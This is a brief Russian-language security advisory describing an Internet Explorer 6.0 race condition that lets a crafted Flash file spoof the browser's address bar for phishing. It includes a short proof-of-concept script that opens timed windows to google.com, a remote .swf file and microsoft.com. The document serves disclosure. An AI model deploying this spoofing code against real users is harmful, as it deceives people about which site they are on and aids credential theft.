Программа: Microsoft Internet Explorer 6.0

Уязвимость позволяет удаленному пользователю подменить содержимое адресной
строки браузера и произвести фишинг-атаку.

Уязвимость состояния операции обнаружена в Microsoft Internet Explorer при
загрузке содержимого Web страницы и файлов формата Macromedia Flash (".swf") в
окне браузера. Удаленный пользователь может подменить адресную строку браузера с
помощью специально сформированного Flash файла.

Пример:

<a href="javascript:spoof()">Perform the second Test</a><br>
<script>
function makewin(url) {
win = window.open (url, "new");
}
function spoof() {
makewin(‘http://www.google.com/’);
setTimeout("makewin(‘http://one.fsphost.com/dangquang/musicflash1/bupbebietyeu.swf’)",2000);
setTimeout("makewin(‘http://www.microsoft.com/’)",4000);
}
</script>

 

Оставить мнение